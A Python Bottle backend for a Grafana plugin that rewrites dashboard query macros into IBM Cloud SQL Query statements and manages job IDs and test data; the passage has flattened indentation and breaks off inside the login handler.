print("No concurrency")
pass
import math
import os
import random
import re
import sys
from calendar import timegm
from datetime import date, datetime
from enum import Enum
from time import sleep
import ibm_botocore
import numpy as np
import regex
from bottle import Bottle, HTTPResponse, run, request, response
from bottle import json_dumps
try:
import cPickle as pickle
except ImportError:
import pickle
from pandas.io.json import build_table_schema
import json
import sqlparse
from sqlparse.sql import IdentifierList, Identifier
from sqlparse.tokens import Keyword
import logging
import pandas as pd
import threading
from threading import Thread
from joblib import Memory
sys.path.insert(0, "../../Python/")
try:
from cloud_utilities.sql_query import SQLClient
from cloud_utilities.sql_magic import format_sql
from cloud_utilities.cos import ParsedUrl
except ImportError:
from ibmcloudsql.sql_query_ts import SQLClientTimeSeries as SQLClient
from ibmcloudsql.sql_magic import format_sql
from ibmcloudsql.cos import ParsedUrl
from ibmcloudsql.exceptions import (
CosUrlNotFoundException,
CosUrlInaccessibleException,
SqlQueryCrnInvalidFormatException,
RateLimitedException,
)
logger = logging.getLogger()
# since Python 3.3
logging.basicConfig(
# level=logging.DEBUG,
level=logging.INFO,
format="%(asctime)s [%(threadName)-12.12s] [%(levelname)s] %(message)s",
handlers=[logging.FileHandler("debug.log"), logging.StreamHandler()],
)
IAM_MAX_TRIES = 5
DEBUG = False
MAX_TRIES = 100
def get_parser():
import argparse
parser = argparse.ArgumentParser(description="Process backend webapp")
parser.add_argument(
"--time-out",
"-t",
dest="time_out",
help="the time-out of request in seconds (default: unlimited)",
)
parser.add_argument(
"--ssl", dest="ssl", action="store_true", help="run as HTTPS web server"
)
args = parser.parse_args()
return args
lock = threading.Lock()
lock_savejob = threading.Lock()
# use this to transform TS-related queryto CloudSQL-compliant form
#singletonSqlClient = SQLClient()
# command-line argument
cmd_args = get_parser()
cachedir = "_cache_dir"
memory = Memory(cachedir, verbose=0)
def query_data(key, key_refId, sql_stmt, rerun=False, sqlClient=None):
"""return data + job_id"""
if cmd_args.time_out is None:
# no time-out
# df = sqlClient.run_sql(sql_stmt)
df = None
if rerun:
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
res = sqlClient.execute_sql(sql_stmt, get_result=True)
df, job_id = res.data, res.job_id
else:
with lock:
sql_stmt = grafanaPluginInstances.get_sqlclient(key, thread_safe=True).human_form_to_machine_form(sql_stmt)
df, job_id = _query_data_with_result(key, sql_stmt, sqlClient)
if isinstance(df, str):
df = None
return df, job_id
else:
# with time-out
if rerun:
# not support - need to implement a mechanism in that an rerun query with timeout
# would not lead to another rerun (i.e. automatically switch off the rerun
# flag at Grafana plugin level) --> so that the next one to retrieve the data only
assert 0
else:
job_id = grafanaPluginInstances.get_job_id(key, key_refId)
if job_id is None:
job_id = sqlClient.submit_sql(sql_stmt)
grafanaPluginInstances.save_job_id(key, key_refId, job_id)
job_status = sqlClient.wait_for_job(job_id, sleep_time=10)
df = None
if job_status == "completed":
df = sqlClient.get_result(job_id)
# check if job_id is present
# if so, check if job status is completed
# - if so, get the data
# if not, wait until time-out
# if time-out and still no result, send the error message back to wait a little bit and launch again
# TODO: add a time-start here
# WARNING: multi-queries lead to fail of returning job-list (429 error) --> need to consult Torsten to fix on their side
# while not sqlClient.has_available_slot():
# # TODO - add a time-window check here (subtracting time-start)
# # when it is closed to service timeout, e.g. 10min for CloudFunction or CodeEngine
# # returns the proper message asking to rerun again
# # NOTE: better if the time-out is known - as there is no way to know how the time-out is configured for now
# # e.g. on-premise there is no time-out necessary
# time.sleep(4) # seconds
# if rerun:
# # doesn't support rerun on a system with time-out
# assert(0)
# sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
# res = sqlClient.execute_sql(sql_stmt, get_result=True)
# df, job_id = res.data, res.job_id
# else:
# df, job_id = _query_data_with_result(key, sql_stmt)
# sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
# df = sqlClient.get_result(job_id)
# print("SQL URL: ", sqlClient.sql_ui_link())
return df, job_id
def query_data_noresultback(key, sql_stmt, rerun=False, sqlClient=None):
if cmd_args.time_out is None:
# no time-out
if rerun:
# doesn't support rerun on a system with time-out
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
res = sqlClient.execute_sql(sql_stmt, get_result=False)
job_id = res.job_id
else:
job_id = _query_data_noresultback(key, sql_stmt, sqlClient)
else:
# with time-out
if rerun:
# doesn't support rerun on a system with time-out
assert cmd_args.time_out is None
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
res = sqlClient.execute_sql(sql_stmt, get_result=False)
job_id = res.job_id
else:
job_id = _query_data_noresultback(key, sql_stmt, sqlClient)
return job_id
@memory.cache(ignore=["sqlClient"])
def _query_data_with_result(key, sql_stmt, sqlClient=None):
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
res = sqlClient.execute_sql(sql_stmt, get_result=True)
# print("SQL URL: ", sqlClient.sql_ui_link())
return res.data, res.job_id
@memory.cache(ignore=["sqlClient"])
def _query_data_noresultback(key, sql_stmt, sqlClient=None):
"""return job_id"""
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
res = sqlClient.execute_sql(sql_stmt, get_result=False)
# print("SQL URL: ", sqlClient.sql_ui_link())
return res.job_id
# regex
regex_timeFilter = r"\$__timeFilter\s*\((\s*\w*\s*)\)"
p_timeFilter = re.compile(regex_timeFilter)
regex_timeFilterColumn = r"\$__timeFilterColumn\s*\((\s*\w*\s*),(\s*\w*\s*)\)"
p_timeFilterColumn = re.compile(regex_timeFilterColumn)
# regex
regex_source = r"(?<=(?i:FROM)\s)\s*\$__source(?!_)(\s*\(\s*\))?(?=[\b|\n|\s])?"
p_cos_in = re.compile(regex_source)
regex_source = r"(?<=(?i:USING)\s)\s*\$__source(?!_)(\s*\(\s*\))?(?=[\b|\n|\s])?"
p_cos_in_using = re.compile(regex_source)
# regex
regex_source = r"(?<=(?i:FROM)\s)\s*\$__source_test(\s*\(\s*\w*\s*\))?(?=[\b|\n|\s])?"
p_cos_in_test = re.compile(regex_source)
# regex
regex_source = r"(?<=(?i:FROM)\s)\s*\$__source_prev(\s*\(\s*\w*\s*\))(?=[\b|\n|\s])?"
p_cos_in_prev = re.compile(regex_source)
# regex
regex_source = r"(?i:INTO)\s*\$__dest(\s*\([\s|\w|,|/]*\))?(?=[\b|\n|\s])?"
p_cos_out = re.compile(regex_source)
# SELECT TS_EXPLODE(...) AS (real_col1, real_col2)
regex_ts_explode = (
r"(?i)\s*(ts_explode)[\(|\w|\s|\)|\d|,]+[aA][sS]\s*\((.*)\s*,\s*(.*)\)"
)
p_ts_explode = re.compile(regex_ts_explode)
# SELECT fake_col AS real_col
regex_as_column = r"\s*[\w|\s]+[aA][sS]\s+(\w+)\s*$"
p_as_column = re.compile(regex_as_column)
# SELECT real_col
regex_column = r"^\s*(\w+)\s*$"
p_column = re.compile(regex_column)
# nested SELECT statement
regex_nested_select = r"(?i)\(((?>[^\(\)]+|(?R))*)\)"
p_nested_select = regex.compile(regex_nested_select)
def gen_key(id, name):
"""generate the key for finding the right sqlClient object"""
# TODO - this may not work when the single webapp serves different Grafana instances
# --> there is a chance that the same 'id' is shared by these Grafana instances.
return str(id) + "-" + name
def gen_key_refId(dashboardId, panelId, refId):
"""generate the key for finding the right sqlClient object,
using the given (dashboard, panel, sql-id)"""
return "-".join([str(dashboardId), str(panelId), refId])
def json_serial(obj):
"""JSON serializer for objects not serializable by default json code"""
if isinstance(obj, (datetime, date)):
return obj.isoformat()
raise TypeError("Type %s not serializable" % type(obj))
def find_column_mapping(sql_stmt, columns):
"""given the outer SELECT statement
which may contain column defined as, e.g. first(my_col) as new_col,
we want to find this mapping from 'my_col' to 'new_col'
returns
-------
dict:
"""
def get_mapping(stmt):
"""return single column or multiple columns"""
# st AS column
res = re.search(r"(?i)\s*([\w|\s]+)\(([^\)]+)\)\s*[a][s]\s+(\w+)\s*$", stmt)
if res:
return {res.group(2): res.group(3)}
else:
return {}
mapping = {}
parsed = sqlparse.parse(sql_stmt)
try:
stmt = parsed[0]
except IndexError as e:
print(sql_stmt)
print(parsed)
raise e
# assert(stmt.get_type() == "SELECT")
for token in stmt.tokens:
if isinstance(token, IdentifierList):
for identifier in token.get_identifiers():
res = get_mapping(str(identifier))
mapping.update(res)
if isinstance(token, Identifier):
res = get_mapping(str(token))
mapping.update(res)
if token.ttype is Keyword: # from
break
return mapping
def parse_sql_columns(sql):
columns = []
columns = columns + get_columns_from_single_select(sql) + parse_inner_selects(sql)
return columns
def parse_inner_selects(sql_stmt):
"""
find each inner select statement, then parse the columns from each SELECT found
"""
def find_nested_selects(stmt):
x = p_nested_select.findall(sql_stmt)
nested = []
for y in x:
y = y.strip()
if re.search(r"(?i)^select", y):
nested.append(y)
return nested
nested_selects = find_nested_selects(sql_stmt)
columns = []
for s in nested_selects:
columns = columns + parse_sql_columns(s)
return columns
def get_columns_from_single_select(sql):
"""get the list of columns in the 'SELECT' type query.
Returns an empty list, if
1. not a SELECT statement
2. SELECT * is used
History
-------
Mar, 23, 2021: can detect proper column name when comment is used, e.g.
select distinct col1 -- some comment
select distinct col1
-- some comment
"""
def get_columns(stmt):
"""return single column or multiple columns"""
# st AS column
# res = re.search(r"\s*[\w|\s]+[aA][sS]\s+(\w+)\s*$", stmt)
res = p_as_column.search(stmt)
if res:
return res.group(1)
# standalone column
# res = re.search(r'^\s*(\w+)\s*$', stmt)
res = p_column.search(stmt)
if res:
return res.group(1)
res = p_ts_explode.search(stmt)
if res:
return [res.group(2), res.group(3)]
return ""
def append(columns, res):
if isinstance(res, str):
if len(res) > 0:
columns.append(res)
elif isinstance(res, list):
for i in res:
if len(i) > 0:
columns.append(i)
return columns
columns = []
parsed = sqlparse.parse(sql)
try:
stmt = parsed[0]
except IndexError as e:
print(sql)
print(parsed)
raise e
if stmt.get_type() != "SELECT":
return columns
is_present_distinct_all = False
for token in stmt.tokens:
if isinstance(token, IdentifierList):
for identifier in token.get_identifiers():
res = get_columns(str(identifier))
columns = append(columns, res)
if isinstance(token, Identifier):
lines = str(token).splitlines() # ('-- ')
pre_comment = str(token)
for line in lines:
if line.strip().startswith("--"):
pass
else:
line = line.split(" --")[0]
pre_comment = line
break
res = get_columns(pre_comment)
columns = append(columns, res)
is_present_distinct_all = False
if str(token).lower() in ["distinct", "all"]:
is_present_distinct_all = True
if token.ttype is Keyword and is_present_distinct_all is False: # from
break
return columns
class TooManyRowsException(Exception):
"""The error when the query returns too many rows"""
def __init__(self, msg, original_exception=None):
if original_exception is not None:
super().__init__(msg + (": %s" % original_exception))
else:
super().__init__(msg)
self.original_exception = original_exception
class NoResultException(Exception):
"""The error when the query returns nothing"""
def __init__(self, msg, original_exception=None):
if original_exception is not None:
super().__init__(msg + (": %s" % original_exception))
else:
super().__init__(msg)
self.original_exception = original_exception
class SourceType(Enum):
UNUSED = 1
TABLE = 2
COSURL = 3
def RepresentsInt(s):
try:
int(s)
return True
except ValueError:
return False
def process_macro_timeFilterColumn(p_timeFilter, sql_stmt, sdt_from, sdt_to):
pattern = p_timeFilter.search(sql_stmt)
while pattern:
# the $__timeFilterColumn is used
time_col = pattern.group(1).strip().lower()
type_of_column = pattern.group(2).strip().lower()
substr = ""
# process for regular data
if "string" == type_of_column:
# the type is string
# if {time_col} is in timestamp
substr += """ to_timestamp({time_col}) BETWEEN to_timestamp("{dt_from}") and to_timestamp("{dt_to}")""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
)
else:
substr += """ cast({time_col}/1000 as long) BETWEEN to_unix_timestamp(to_timestamp("{dt_from}")) and to_unix_timestamp(to_timestamp("{dt_to}"))""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
)
sql_stmt = p_timeFilter.sub(substr, sql_stmt, count=1)
pattern = p_timeFilter.search(sql_stmt)
return sql_stmt
def process_macro_data_source(p_reg, func_get_macro_mapping, key, sql_stmt):
"""
process $__source macro
Parameters
----------
p_reg:
pattern object to detect the present of the macro
func_get_macro_mapping:
a function that translate from a key to the right data source configured
key: string
the key that is used to identify the right data source
sql_stmt: str
the SQL string
Returns
-------
the decoded SQL string
"""
patterns = p_reg.findall(sql_stmt)
try:
substr = func_get_macro_mapping(key)
except KeyError:
# TODO: maybe we want to resend the credential each time - as when deploying to CodeEngine - the storage is not permanent?
msg = "The webapp doesn't hold CloudSQL info - you may want to revalidate in the datasource setting"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if len(patterns) > 0 and len(substr) == 0:
msg = "Can't use $__source (default value has not been configured yet)"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern:
# the $__source is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
return sql_stmt
def revise_time_column(time_col, df):
"""
the dataframe may has a column representing datetime, but it may be in string format
we need to convert to the right format
target: str, "time-series" or "table"
"""
df.sort_values(by=time_col, inplace=True)
if isinstance(df[time_col][0], str) and df[time_col][0].endswith("Z"):
# remove 'Z' from datetime
# and map to string representtion
try:
tmp = [
str(x)
for x in pd.to_datetime(df[time_col], format="%Y-%m-%dT%H:%M:%S.%fZ")
]
except ValueError:
tmp = [
str(x)
for x in pd.to_datetime(df[time_col], format="%Y-%m-%dT%H:%M:%SZ")
]
df[time_col] = tmp
# datetime64[ns] --> convert to 'ms'
# df[time_col] = pd.to_datetime(df[time_col], format="%Y-%m-%dT%H:%M:%S.%fZ").values.astype('int64') // 10**6
# .values.astype('int64') // 10**6
return df
class CloudSQLDB(dict):
def __init__(self, *arg, **kw):
super(CloudSQLDB, self).__init__(*arg, **kw)
self.db_file = "cloud_cos_db.json"
self.sqlclient_file = "sqlclient_db.pkl"
self.read()
# holding fake time-series data source
self._current_ts_df = {}
self._current_mts_df = {}
# @property
# def data(self):
# return self._content
def read(self):
_content = None
try:
with open(self.db_file, "r") as read_file:
_content = json.load(read_file)
except FileNotFoundError:
pass
if _content:
for k, v in _content.items():
self[k] = v
def save_no_interrupt(self):
a = Thread(target=self.save)
a.start()
a.join()
def save(self):
if len(self.keys()) > 0:
with open(self.db_file, "w") as write_file:
json.dump(self, write_file)
def get_sqlclient(self, key, thread_safe=False):
apiKey = self[key]["apiKey"]
instance_crn = self[key]["instance_crn"]
target_cos_url = self[key]["target_cos_url"]
if thread_safe is False:
if key in grafanaPluginInstancesSqlClient.keys():
sqlClient = grafanaPluginInstancesSqlClient[key]
print("Found SqlClient... ", sqlClient)
else:
sqlClient = SQLClient(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
iam_max_tries=IAM_MAX_TRIES,
max_tries=MAX_TRIES,
)
grafanaPluginInstancesSqlClient[key] = sqlClient
else:
sqlClient = SQLClient(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
thread_safe=True,
iam_max_tries=IAM_MAX_TRIES,
max_tries=MAX_TRIES,
)
print("Create thread-safe SqlClient... ", sqlClient)
sqlClient.logon()
return sqlClient
def get_cos_source(self, key):
# stored_using_table = tmp_body.get('using_table').strip()
if self[key]["using_table"]:
table = self[key]["table"]
if len(table.strip()) == 0:
return ""
else:
return " {} ".format(table)
else:
try:
cos_in = self[key]["source_cos_url"]
except KeyError:
return ""
if len(cos_in.strip()) == 0:
return ""
else:
format_type = self[key]["format_type"]
return "{} STORED AS {}".format(cos_in, format_type)
def get_cos_source_using(self, key):
# stored_using_table = tmp_body.get('using_table').strip()
if self[key]["using_table"]:
table = self[key]["table"]
if len(table.strip()) == 0:
return ""
else:
return " {} ".format(table)
else:
try:
cos_in = self[key]["source_cos_url"]
except KeyError:
return ""
if len(cos_in.strip()) == 0:
return ""
else:
format_type = self[key]["format_type"]
return "{} LOCATION {}".format(format_type, cos_in)
def get_cos_dest(self, key, suffix, format_type):
# stored_using_table = tmp_body.get('using_table').strip()
# if self[key]['target_cos_url'][-1] == '/':
cos_out = "/".join([self[key]["target_cos_url"], suffix])
cos_out = "INTO {} STORED AS {} ".format(cos_out, format_type)
return cos_out
def get_sts_random_data(self, key, dt_from, dt_to):
values = """
FROM VALUES -- timestamp, observation
(1, 10), (2, 20), (3, 30), (4, 40),
(5, 5), (6, 10), (7, 15), (8, 40),
(9, 100), (10, 200), (11, 300), (12, 400)
AS ds
"""
# np.random.seed(2019)
N = 30
rng = pd.date_range(dt_from, dt_to, periods=N)
df = pd.DataFrame(
np.random.randint(20, size=(N, 2)),
columns=["timestamp", "observation"],
index=rng,
)
##.rename(columns={df.index.name:'timestamp'})
df = df.drop("timestamp", axis=1)
# df.reset_index(inplace=True)
# df.rename(columns={"index":"timestamp"})
# df.index = pd.to_datetime(df['index']).astype(np.int64) // 10**6
df.index = pd.to_datetime(df.index).astype(np.int64) // 10 ** 6
if key not in self._current_ts_df:
self._current_ts_df[key] = df
else:
idx_start = (
pd.to_datetime(dt_from).to_datetime64().astype(np.int64) // 10 ** 6
)
idx_end = pd.to_datetime(dt_to).to_datetime64().astype(np.int64) // 10 ** 6
# idx_start = df.iloc[0].name
# idx_end = df.iloc[-1].name
df = df.loc[(df.index > self._current_ts_df[key].iloc[-1].name)]
self._current_ts_df[key] = self._current_ts_df[key].append(df)
# NOTE : currently not removing old ones
# self._current_ts_df[key] = self._current_ts_df[key].loc[(self._current_ts_df[key].index >= idx_start) & (self._current_ts_df[key].index <= idx_end)]
# df = self._current_ts_df[key]
df = self._current_ts_df[key].loc[
(self._current_ts_df[key].index >= idx_start)
& (self._current_ts_df[key].index <= idx_end)
]
x = list(df.to_records(index=True))
data = ", ".join([str(i) for i in x])
assert len(data) > 0
values = """
VALUES -- timestamp, observation
{}
AS ds
""".format(
data
)
return values
def get_mts_random_data(self, key, dt_from, dt_to):
values = """
FROM VALUES -- key, timestamp, observation
(2017, 1 ,100),
(2017, 1 ,50),
(2017, 2 ,200),
(2017, 2 ,300),
(2018, 1 ,300),
(2018, 1 ,100),
(2018, 2 ,400) AS ds
"""
# np.random.seed(2019)
num_metrics = 2
df = None
for i in range(0, num_metrics + 1):
N = np.random.randint(20, 30)
rng = pd.date_range(dt_from, dt_to, periods=N)
tmp_df = pd.DataFrame(
np.hstack((np.random.randint(20, size=(N, 1)), np.array([[i] * N]).T)),
columns=["observation", "key"],
index=rng,
)
if df is None:
df = tmp_df
else:
df = df.append(tmp_df, ignore_index=False)
idx_start = pd.to_datetime(dt_from).to_datetime64().astype(np.int64) // 10 ** 6
idx_end = pd.to_datetime(dt_to).to_datetime64().astype(np.int64) // 10 ** 6
# millisecond
df.index = pd.to_datetime(df.index).astype(np.int64) // 10 ** 6
if key not in self._current_mts_df:
self._current_mts_df[key] = df
else:
df = df.loc[(df.index > self._last_mts_idx_end)]
self._current_mts_df[key] = self._current_mts_df[key].append(df)
# NOTE : currently not removing old ones
# self._current_mts_df[key] = self._current_mts_df[key].loc[(self._current_mts_df[key].index >= idx_start) & (self._current_mts_df[key].index <= idx_end)]
# df = self._current_mts_df[key]
df = self._current_mts_df[key].loc[
(self._current_mts_df[key].index >= idx_start)
& (self._current_mts_df[key].index <= idx_end)
]
x = list(df.to_records(index=True))
data = ", ".join([str(i) for i in x])
assert len(data) > 0
values = """
VALUES -- timestamp, observation, key
{}
AS ds
""".format(
data
)
self._last_mts_idx_end = idx_end
return values
def get_job_id(self, key, refId):
"""return the job_id associated with a given `key`
Return
------
str: the job_id if found; otherwise return None
"""
if "refId" not in self[key]:
with lock_savejob:
if "refId" not in self[key]:
self[key]["refId"] = {}
if refId in self[key]["refId"]:
return self[key]["refId"][refId]
else:
return None
def save_job_id(self, key, refId, job_id):
"""save the job_id for the
(query in the given dashboard/panel) ~ 'refId' and
(datasource) ~ 'key'
NOTE: The information will be used by `get_cos_source_prev`"""
if "refId" not in self[key]:
with lock_savejob:
if "refId" not in self[key]:
self[key]["refId"] = {}
self[key]["refId"][refId] = job_id
self.save_no_interrupt()
def get_cos_source_prev(self, key, refId):
"""get COS URL from the output of a previous query
Exceptions
----------
KeyError"""
sqlClient = self.get_sqlclient(key, thread_safe=True)
job_id = self[key]["refId"][refId]
job_info = sqlClient.get_job(job_id)
res = "{} STORED AS {}".format(
job_info["resultset_location"], job_info["resultset_format"]
)
return res
def should_sql_stmt_be_run(self, key, refId, sql_stmt, sleep_time):
"""return True if it is safe to launch the query, i.e. no further change to it"""
milliseconds_since_epoch = datetime.now().timestamp() * 1000
print(self)
if "query" not in self[key]:
print("query not in self")
with lock:
if "query" not in self[key]:
self[key]["query"] = {}
if refId not in self[key]["query"]:
with lock:
if refId not in self[key]["query"]:
self[key]["query"][refId] = {}
if sql_stmt not in self[key]["query"][refId]:
with lock:
if sql_stmt not in self[key]["query"][refId]:
self[key]["query"][refId][sql_stmt] = milliseconds_since_epoch
elif milliseconds_since_epoch > self[key]["query"][refId][sql_stmt]:
with lock:
if milliseconds_since_epoch > self[key]["query"][refId][sql_stmt]:
self[key]["query"][refId][sql_stmt] = milliseconds_since_epoch
sleep(sleep_time) # seconds
# if milliseconds_since_epoch == self[key]['query'][refId][sql_stmt]:
# # no new request to same query
# return True
if milliseconds_since_epoch < self[key]["query"][refId][sql_stmt]:
# there is a new request
return False
return True
# from cloud_utilities import test_credentials
# ref_cloud_apikey = test_credentials.apikey
# ref_instance_crn = test_credentials.instance_crn
# ref_target_cos_url = test_credentials.result_location
# store information of each datasource-plugin 'id'
grafanaPluginInstances = CloudSQLDB()
# store the object connecting to SQL Client service
grafanaPluginInstancesSqlClient = {}
# data_schema = {}
# default_sql_client = None
# aiOps = SQLClient(api_key=ref_cloud_apikey, instance_crn=ref_instance_crn, target_cos_url=ref_target_cos_url)
##aiOps = SQLClient(api_key=cloud_apikey_raghu, instance_crn=instnacecrn, target_cos_url=target_cos_url, max_concurrent_jobs=4)
# aiOps.logon()
# sqlClient = aiOps
# sqlClient.engine.sql_ui_link()
#
##dict_data = sqlClient.get_cos_summary("cos://s3.us-south.cloud-object-storage.appdomain.cloud/sql-query-cos-access-ts/jobid=a3475263-469a-4e22-b382-1d0ae8f1d1fa")
# df = sqlClient.list_results("a3475263-469a-4e22-b382-1d0ae8f1d1fa")
# print(df.to_string())
# with pd.option_context('display.max_rows', None, 'display.max_columns', None): # more options can be specified also
# print(df)
app = Bottle()
# FUNCTIONS = {'series A': math.sin, 'series B': math.cos}
FUNCTIONS = {"series A": math.sin, "series B": "series B"}
tabular_data = {
"series A": [
{
"columns": [
{"text": "Time", "type": "time"},
{"text": "Country", "type": "string"},
{"text": "Number", "type": "number"},
],
"rows": [[1234567, "SE", 123], [1234567, "DE", 231], [1234567, "US", 321]],
"type": "table",
}
],
"series B": [
{
"columns": [
{"text": "Time", "type": "time"},
{"text": "Country", "type": "string"},
{"text": "Number", "type": "number"},
],
"rows": [[1234567, "BE", 123], [1234567, "GE", 231], [1234567, "PS", 321]],
"type": "table",
}
],
}
def convert_to_time_ms(timestamp):
"""Convert a Grafana timestamp to unixtimestamp in milliseconds
Args:
timestamp (str): the request contains ``'range': {'from':
'2019-06-16T08:00:05.331Z', 'to': '2019-06-16T14:00:05.332Z', ...``
"""
return 1000 * timegm(
datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%S.%fZ").timetuple()
)
def create_data_points(func, start, end, length=1020):
"""
A dummy function to produce sine and cosine data
You should replace this with your SQL, CQL or Mongo Query language.
Also, make sure your database has the correct indecies to increase perfomance
Args:
func (object) - A callable that accepts a number and returns a number
start (str) - timestamp
end (str) - timestamp
length (int) - the number of data points
"""
lower = convert_to_time_ms(start)
upper = convert_to_time_ms(end)
return [
[func(i), int(i)]
for i in [lower + x * (upper - lower) / length for x in range(length)]
]
def create_data_points_name_func(series_name_or_func, start, end, length=1020):
"""Generate fake data"""
if isinstance(series_name_or_func, str):
series_name = series_name_or_func
lower = convert_to_time_ms(start)
upper = convert_to_time_ms(end)
if series_name == "series B":
return [
[random.randint(0, 100), int(i)]
for i in [lower + x * (upper - lower) / length for x in range(length)]
]
else:
func = series_name_or_func
return create_data_points(func, start, end, length=length)
@app.route("/", method="GET")
def index():
return "<h1> Hello world</h1>"
@app.route("/login", method=["POST", "GET"])
def login():
"""handle 'testDataSource() - test connection to data source
Returns
-------
str
"OK"
"""
if request.method == "GET":
return "<h1>Testing login</h1>"
logger.debug("========= PRINT REQUEST ============")
logger.debug(request)
logger.debug("========= END PRINT REQUEST ============")
body = request.body.read().decode("utf-8")
body = json.loads(body)
import pprint
logger.debug("========= PRINT body of REQUEST ============")
pprint.pprint(body, width=1)
logger.debug("========= END PRINT body of REQUEST ============")
# apiKey = request.forms.get('apiKey')
# instance_crn = request.forms.get('instance_crn')
# result_location = request.forms.get('result_location')
# target_cos_url = request.forms.get('target_cos_url')
# instance_rate_limit = request.forms.get('instance_rate_limit')
print("Handling /login request")
key = gen_key(body.get("id"), body.get("name"))
# always update
data_exist = False
if key in grafanaPluginInstances.keys():
tmp_body = grafanaPluginInstances[key]
stored_apiKey = tmp_body.get("apiKey").strip()
stored_instance_crn = tmp_body.get("instance_crn").strip()
stored_target_cos_url = tmp_body.get("target_cos_url").strip()
stored_source_cos_url = tmp_body.get("source_cos_url", "").strip()
stored_table = tmp_body.get("table", "").strip()
stored_using_table = tmp_body.get("using_table")
stored_instance_rate_limit = tmp_body.get("instance_rate_limit").strip()
stored_format_type = tmp_body.get("format_type", "").strip()
data_exist = True
# grafanaPluginInstances[key]['apiKey'] = body.get('apiKey')
# grafanaPluginInstances[key]['instance_crn'] = body.get('instance_crn')
# grafanaPluginInstances[key]['apiKey'] = body.get('apiKey')
# grafanaPluginInstances[key]['target_cos_url'] = body.get('target_cos_url')
# grafanaPluginInstances[key]['source_cos_url'] = body.get('source_cos_url')
# grafanaPluginInstances[key]['format_type'] = body.get('format_type')
# grafanaPluginInstances[key]['instance_rate_limit'] = body.get('instance_rate_limit')
# extract information
if "instance_crn" not in body or len(body["instance_crn"]) == 0:
msg = "Need CloudSQL CRN"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
instance_crn = body.get("instance_crn").strip()
if "apiKey" not in body or len(body["apiKey"]) == 0:
msg = "Need apiKey"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
apiKey = body.get("apiKey").strip()
# result_location = body.get('result_location').strip()
source_type = SourceType.UNUSED
if "using_table" not in body:
# TODO if this occur - go back and check why default value is not set in Grafana plugin
body["using_table"] = False
if body["using_table"] is False:
if "source_cos_url" in body and len(body["source_cos_url"]) > 0:
source_cos_url = body.get("source_cos_url").strip()
format_type = body.get("format_type").strip()
if source_cos_url is None or not ParsedUrl().is_valid_cos_url(
source_cos_url
):
msg = "Invalid COS URL for source"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
else:
source_type = SourceType.COSURL
else:
if "table" in body and len(body["table"]) > 0:
table = body.get("table").strip()
source_type = SourceType.TABLE
if "target_cos_url" not in body or len(body["target_cos_url"]) == 0:
msg = "Need target COS URL"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
target_cos_url = body.get("target_cos_url").strip()
msg = "Need rate limit as an int > 0"
e = HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
if "instance_rate_limit" not in body or len(body["instance_rate_limit"]) == 0:
raise e
elif not RepresentsInt(body["instance_rate_limit"]):
raise e
instance_rate_limit = body.get("instance_rate_limit").strip()
# assert(ref_cloud_apikey == apiKey)
# assert(ref_instance_crn == instance_crn)
if target_cos_url is None or not ParsedUrl().is_valid_cos_url(target_cos_url):
msg = "Invalid COS URL for target"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
# print(apiKey)
# print(instance_crn)
# print(result_location)
# print(target_cos_url)
# print(instance_rate_limit)
# logger.info(apiKey)
if key not in grafanaPluginInstancesSqlClient.keys():
# TODO: consider add max_concurrent_jobs info from `instance_rate_limit`
sqlClient = SQLClient(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
iam_max_tries=IAM_MAX_TRIES,
max_tries=MAX_TRIES,
max_concurrent_jobs=instance_rate_limit,
)
grafanaPluginInstancesSqlClient[key] = sqlClient
if DEBUG:
print("Create new SQLClient: ", sqlClient)
# grafanaPluginInstances.save_sqlclients()
else:
sqlClient = grafanaPluginInstancesSqlClient[key]
try:
sqlClient.logon()
if sqlClient.logged_on is True:
if DEBUG:
print("Found SQLClient: ", sqlClient)
except AttributeError:
# recreate
sqlClient = SQLClient(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
iam_max_tries=IAM_MAX_TRIES,
max_tries=MAX_TRIES,
max_concurrent_jobs=instance_rate_limit,
)
grafanaPluginInstancesSqlClient[key] = sqlClient
if DEBUG:
print("Create new SQLClient: ", sqlClient)
response.headers["Content-Type"] = "application/json"
try:
if data_exist and (
stored_apiKey != apiKey
or instance_crn != stored_instance_crn
or stored_target_cos_url != target_cos_url
or instance_rate_limit != stored_instance_rate_limit
):
if DEBUG:
print("HTTP input: ", instance_crn, " \n", apiKey)
sqlClient.configure(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
)
# test API key
sqlClient.logon()
print("SQL URL: ", sqlClient.sql_ui_link())
# test SQL Query CRN
# test COS OUT URL
sql_stmt = """
SELECT 1
INTO {target_cos_url} STORED AS CSV
""".format(
target_cos_url=target_cos_url
)
sqlClient.run_sql(sql_stmt)
# # test COS IN URL
if source_type == SourceType.COSURL:
